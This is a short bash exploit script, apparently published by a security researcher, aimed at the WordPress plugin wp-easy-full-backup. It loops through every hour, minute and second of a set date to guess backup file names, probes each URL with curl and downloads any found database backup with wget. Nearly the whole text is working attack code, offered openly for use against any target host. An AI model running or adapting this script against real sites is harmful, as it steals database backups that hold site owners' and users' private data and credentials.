#!/bin/bash # database download brute forcer for https://wordpress.org/plugins/wp-easy-full-backup # start date 01/24/2017 @_larry0 # The plugin wp-easy-full-backup creates wordpress backups that can be guessed # This script will search for the day's backup and download it. D=24 #Day M=01 #Month Y=2017 #Year for h in `seq -w 0 23`; do for y in `seq -w 0 59`; do for x in `seq -w 0 59`; do CPATH="http://$1/wp-content/uploads/wp-easy-full-backup/backup_$D"_"$M"_"$Y"_"$h"_"$x"_"$y.zip"; echo $CPATH; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Database backup $CPATH Found"; echo "[+] Received $RESULT"; wget $CPATH exit; #break here fi; x=$x+1; done y=$y+1; done h=$h+1; done